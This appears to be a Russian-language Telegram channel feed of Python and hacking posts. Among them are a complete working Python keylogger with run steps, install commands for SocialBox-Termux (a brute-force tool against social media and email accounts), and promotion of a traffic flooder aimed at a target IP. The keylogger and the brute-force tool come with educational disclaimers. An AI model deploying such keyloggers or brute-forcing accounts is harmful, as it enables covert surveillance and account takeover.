CodeGuard: CyberSec Edition

🐍 Шпаргалка по Python для хакеров и разработчиков Если вы работаете в сфере кибербезопасности, автоматизации задач или просто изучаете Python — эта шпаргалка станет вашим незаменимым помощником. 📌 Ресурс содержит всё самое важное о языке в удобном виде: синтаксис, типы данных, функции, классы, обработку ошибок и многое другое. 🔗 GitHub: Python Cheat Sheet Что внутри: - Базовые конструкции и переменные - Типы данных: строки, числа, списки, словари, кортежи - Циклы и условия - Функции и модули - ООП (объектно-ориентированное программирование) - Обработка исключений - Работа с файлами - Полезные стандартные библиотеки - Примеры кода для быстрого копирования Почему это удобно? ✔️ Кратко и по делу ✔️ Отлично структурировано ✔️ Подходит как новичкам, так и опытным разработчикам ✔️ Полезно при написании скриптов для пентестов, автоматизации и CTF 😈 CodeGuard

🪙 [Перевод] Кибербезопасность: Тикaющая бомба замедленного действия 🐍Разбор уязвимостей: Об авторе Уилл Кнер — старший менеджер по информационной безопасности и защите данных в компании i-PRO Americas Inc. Если вы работаете в сфере физической безопасности, вы наверняка сталкивались с этим: камера, система контроля доступа или устройство обнаружения вторжений, установленные несколько лет назад и до сих пор функционирующие без единого обновления. Это распространённая ситуация, которую специалисты по безопасности привыкли считать «нормой». Но реальность такова: такое отношение напрямую подвергает организацию серьёзному риску. 📖 Читать дальше 😈 CodeGuard | #cybersecurity

📱 Задачка 😈 CodeGuard | #task #python

💻Нашли для вас самый крутой блог белого хакера На своëм канале он уже осветил такие темы, как: — Мониторинг производительности сети — IP-адресация — Сетевой мониторинг — Модель OSI — Направления в хакинге — Как работает Tor 👀Подписывайся, чтобы не потерять

🆒 Tookie-osint - сбор информации из открытых источников (для разведки, расследований, анализа угроз)

Tookie-osint имеет простой в использовании пользовательский интерфейс и действительно понятен. Основная идея Tookie-osint заключается в обнаружении имен пользователей, запрашиваемых из ввода. Tookie-osint похож на инструмент под названием Sherlock. Он обнаруживает все учетные записи пользователей на разных веб-сайтах, и Tookie-osint успешно справляется с этой задачей почти в 80% случаев. Наш инструмент был создан мной и сообществом и доступен для вашего использования

☠️ Я не несу ответственности за любые вредоносные действия и/или ответственность, вызванную инструментом. :( Обратите внимание, что Tookie-osint был создан, чтобы помочь новым программистам или пентестерам войти в мир OSINT. Цель — сделать Tookie-osint настолько идеальным, насколько я могу, и сделать его простым для понимания новыми программистами. Также обратите внимание, что Tookie-osint оптимизирован для Python. 📱 GutHub 😈 CodeGuard | #cybersecurity #python #linux

🛠 Telegram Bot API 9.1 — чеклисты, подарки и другое 🪄 Как сделать проще?

Telegram продолжает расширять возможности своего мессенджера — в свежем- обновлении Bot API 9.1 разработчикам стали доступны удобные инструменты для работы с чек-листами, подарками и рядом других функций.

Новые классы для чек-листов и задач: 🔹ChecklistTask — класс, описывающий задачу в чек-листе. 🔹Checklist — класс, описывающий сам чек-лист. 🔹 InputChecklistTask — класс для добавления новой задачи в чек-лист. 🔹 InputChecklist — класс для создания чек-листа. 🔹Интеграция чек-листов в сообщения В классах Message и ExternalReplyInfo появился новый поле checklist , которое содержит информацию о прикреплённом чек-листе. 💡Читать полностью на Хабре 😈 CodeGuard | #python

🐧Нашли для вас самый крутой блог Администратора Linux На своëм канале он уже осветил такие темы, как: — Что такое ядро Linux и зачем оно нужно? — Как защитить свой Linux от взлома — Как создать собственный ISO-образ в Linux — Linux и управление пакетами — Процессы в Linux и отладка зависаний 👀Подписывайся, чтобы не потерять

📚 Лаборатория Хакера. Автор: С.А. Бабин Год издательства: 2018

«Понимание безопасности начинается с понимания атак» Если ты хочешь посмотреть на ИБ глазами злоумышленника — эта книга станет твоим личным лабораторным практикумом. Она не просто рассказывает о методах хакерства — она учит думать как хакер. Что внутри? 🗣Перехват паролей и анализ сетевого трафика 🗣Взлом Wi-Fi: от теории до рабочего ключа 🗣Действия после проникновения в локальную сеть 🗣Шифрование, инкогнито в интернете и работа с прокси 🗣Хакинг на смартфоне — потому что безопасность мобильных систем тоже важна 🗣Работа с радужными таблицами и взлом Active Directory 📌Подходит: - Начинающим энтузиастам кибербезопасности - Студентам и старшеклассникам с интересом к IT - Тем, кто хочет почувствовать уязвимости, а не просто прочитать про них Все примеры подробно и понятно — каждый шаг объяснён так, что даже новичок разберётся. 📲Бери книгу → [Code Guard: Archive] 😈 CodeGuard | #book #infosec #hacking #cybersecurity

Создание простого логгера клавиатуры (для обучения) Как работают keylogger'ы? — сегодня разберём, как создать простой логгер нажатий клавиш с помощью Python. 💻 Keylogger - это программа, которая записывает все нажатия на клавиатуре. Иногда используется злоумышленниками, но также может быть полезен для анализа пользовательского поведения или в игровых движках. 🛠 Пример: логгер клавиатуры на Python

from pynput import keyboard  # Библиотека для перехвата событий клавиатуры

# Путь к файлу, в который будут записываться нажатия
LOG_FILE = "key_log.txt"


def on_press(key):
    """
    Функция вызывается каждый раз при нажатии клавиши.
    Принимает объект key, представляющий нажатую клавишу.
    """
    try:
        # Пытаемся получить обычный символ (например, 'a', 'b', '1' и т.д.)
        with open(LOG_FILE, "a", encoding="utf-8") as f:
            f.write(f"{key.char}")
    except AttributeError:
        # Если это не обычный символ (например, пробел, Enter, Shift и т.п.)
        if key == keyboard.Key.space:
            # Записываем пробел
            with open(LOG_FILE, "a", encoding="utf-8") as f:
                f.write(" ")
        elif key == keyboard.Key.enter:
            # Записываем переход на новую строку
            with open(LOG_FILE, "a", encoding="utf-8") as f:
                f.write("\n")
        else:
            # Для всех остальных специальных клавиш — записываем их имя в квадратных скобках
            with open(LOG_FILE, "a", encoding="utf-8") as f:
                f.write(f" [{key}] ")


def start_logger():
    """Запускает логгер и ожидает нажатий клавиш."""
    print("[+] Логгер запущен. Нажмите ESC для выхода.")
    
    # Создаём слушатель клавиатуры
    with keyboard.Listener(on_press=on_press) as listener:
        listener.join()  # Ждём завершения работы (нажатие ESC)


# Точка входа в программу
if __name__ == "__main__":
    start_logger()

✅ Как использовать? 1. Установи библиотеку pynput:

pip install pynput

2. Сохрани код как keylogger.py 3. Запусти:

python keylogger.py

4. Нажимай клавиши — всё будет записываться в файл key_log.txt. 🔍 Что делает этот скрипт? - Слушает нажатия клавиш через pynput - Обрабатывает специальные символы (Enter, Space) - Сохраняет данные в текстовый файл 📌 Важно! - Это локальный логгер, он работает только если вы его запустите - Он не отправляет данные куда-либо - Не используйте без ведома пользователя - Для защиты от таких программ — следите за процессами и сетевым трафиком 🧠 Как обнаружить такой логгер? - Смотрите список запущенных процессов - Проверяйте подозрительные сетевые соединения - Используйте антивирусы и EDR-решения ⚠️ Этот пример только для обучения, не для злонамеренного использования. Используйте только в тестовой среде или на своём ПК. Полный код [Архив] 📌 Вывод Keylogger — это не магия, а всего лишь перехват событий ввода. Понимание того, как они работают, помогает лучше защищаться от реальных угроз. 😈 CodeGuard | #python #ethicalhacking #практика

⚙️ Нашли для вас самый крутой блог senior python-программиста На своëм канале он уже осветил такие темы, как: — Почему твой Python-код медленный? — Walrus-оператор в Python — Почему нужно писать is None, а не == None? — Почему or в Python работает не так, как ты думаешь? — Почему нельзя использовать изменяемые значения по умолчанию? 👀Подписывайся, чтобы не потерять

📱 Задачка Ставь 🔥 если не почувствовал 😈 CodeGuard | #task #python

🧩Типизация в Python: как аннотации спасают ваш код и ускоряют разработку 💻 Сегодня: интересное из мира Python Привет, участникам CodeGuard! Python - язык с динамической типизацией. Хорошо это или плохо? С одной стороны, это скорость разработки: не нужно объявлять и запоминать типы переменных. С другой, это ошибки, которые всплывают при запуске или... через месяц продакшена.В этой статье я покажу, почему type hinting - инструмент, который сэкономит часы отладки и сделает код безопаснее. Аннотации типов впервые были представлены в Python 3.5, который появился в 2015 году. Но до сих пор многие разработчики продолжают писать код в старом стиле. Давайте разберемся, как правильно писать код и что для этого нужно! 🙂 Ссылка на статью внутри 😈 CodeGuard | #python

🚨 SocialBox-Termux: фреймворк для брутфорса в соцсетях ⚠️ Информация представлена исключительно в образовательных целях. Никогда не используйте инструменты взлома без прямого разрешения владельца системы. SocialBox-Termux — это мощный фреймворк для тестирования безопасности аккаунтов методом подбора паролей. Поддерживает: Facebook, Gmail, Instagram, Twitter Создан Белахсаном Оуэрги, доработан и адаптирован samsesh для мобильного использования через Termux. 🛠 Установка:

apt-get update
apt-get install git
git clone https://github.com/samsesh/SocialBox-Termux.git
cd SocialBox-Termux
chmod +x install-sb.sh
./install-sb.sh

▶️ Запуск:

./SocialBox.sh

🔡 Протестировано: - Termux (Android) - Работает с Tor (рекомендуется использовать VPN) Этот инструмент — отличный пример того, как простые атаки могут быть эффективны. Используйте его, чтобы понять уязвимости, а не причинить вред. 🔗 GitHub 😈 CodeGuard | #osint #hacking #tool

🛠 Автоматизация Telegram-канала с помощью ChatGPT и Aiogram — просто о сложном ✨ Полезный сниппет дня Привет, участникам CodeGuard! Сегодня я расскажу: Как можно автоматизировать ведение своего ТГ канала с помощью ИИ. На мой взгляд тема довольно свежая и интересная, а что самое главное полезная. Статья по большей мере ориентирована на новичков у которых имеются базовые знания python, но это не означает что другим она не будет интересна. Итак, начнем! 🙂 Ссылка на статью внутри 😈 CodeGuard | #python

🧪 Turbo-Attack — генератор рандомного сетевого трафика для пентестов

Turbo-Attack — это мощный инструмент для генерации искусственного сетевого трафика с максимально возможной энтропией: случайные MAC-адреса, IP, последовательности пакетов и выбор портов. Всё — нацелено на конкретный IP, идеально для стресс-тестов, эмуляции атак и анализа поведения IDS/IPS-систем.

Инструмент заточен под Linux: работает на Kali, Debian, ARM64 и AMD64, с поддержкой IPv4 и IPv6. С его помощью можно имитировать поток "живого" трафика — миллионы пакетов, будто целая ботнета решила навестить твой сервер. Полезен для тестирования сетевых систем, фейковых активностей и нагрузочных сценариев. 📱 GitHub 😈 CodeGuard | #security #hack

🧠 SOAP, WSDL и немножко Python создаём веб-сервис шаг за шагом ✅ Эффективно и быстро Практика — лучший способ глубокого понимания теории. Рассмотрим на примере, как работают веб-сервисы с протоколом SOAP, для чего нужен WSDL и как он связан с XML-документом в теле POST-запроса.

REST (Representational State Transfer) — это архитектурный стиль, основанный на HTTP-протоколе, который используется для разработки приложений с фронтендом или интеграционными потоками. REST не предусматривает строгих стандартов использования типовых HTTP-методов, а лишь описывает рекомендации, которым должны следовать проектируемые сервисы API. Одной из ключевых особенностей REST API является представление данных в виде набора ресурсов, каждый из которых имеет свой уникальный унифицированный идентификатор (URI). SOAP (Simple Object Access Protocol) — это протокол обмена сообщениями в формате XML, основанный на технологии удалённого вызова процедур. Он работает через различные протоколы передачи данных (HTTP, SMTP, TCP, UDP). Данный протокол представляет собой более строгий и формализованный подход к обмену данными, что делает его похожим на детально проработанное соглашение, практически исключающее вероятность ошибок в работе.

🔑Читать полностью на Хабре 😈 CodeGuard | #python

🔐 ТОП-5 Шпаргалок и ресурсов для хакеров и специалистов по кибербезопасности Если вы начинающий или опытный специалист в сфере безопасности — эти ресурсы помогут вам поднять навыки на новый уровень. 📌 Все они доступны бесплатно и регулярно обновляются сообществом. 1️⃣ Awesome Hacking Resources Сборник инструментов, курсов, CTF, YouTube-каналов и многого другого для обучения и практики. 🔗[GitHub] 2️⃣ OWASP Cheat Sheet Series Серия шпаргалок по безопасности веб-приложений. Отличный справочник по основным аспектам защиты от OWASP Top 10. 🔗[GitHub] 3️⃣ Pentest Cheat Sheet Полезные команды и советы для тестирования на проникновение: от разведки до эксплуатации уязвимостей. 🔗 [GitHub] 4️⃣ Kali Linux Cheat Sheet Основные команды и инструменты популярного дистрибутива Kali Linux для пентеста и анализа безопасности. 🔗 [GitHub] 5️⃣ Nmap Cheat Sheet Универсальный гайд по Nmap — лучшему инструменту для сканирования сетей и портов. 🔗 [GitHub] 😈 CodeGuard | #хакинг #pentest

⭐️ Действительно ли наши устройства слушают нас? Вы когда-нибудь замечали странное совпадение: просто упомянули вслух, что хотите купить новую беговую дорожку, а спустя час ваш телефон вдруг выдает баннер с рекламой спорттоваров? Для многих это — пугающая загадка. Мы начинаем подозревать, что нас повсюду «прослушивают»: смартфоны, смарт-колонки, телевизоры, ноутбуки, «умные» холодильники...

В этом посте мы разберемся, действительно ли наши устройства ведут непрерывную аудиоразведку, чтобы «кормить» нас прицельной рекламой, или же всё можно списать на мощные алгоритмы анализа данных (которые, к слову, тоже знают о нас очень многое). Также вы узнаете, откуда именно нас могут «слушать»: рассмотрим смартфоны, смарт-колонки, Smart TV и даже «умные» пылесосы.

🔝 Подробнее 😈 CodeGuard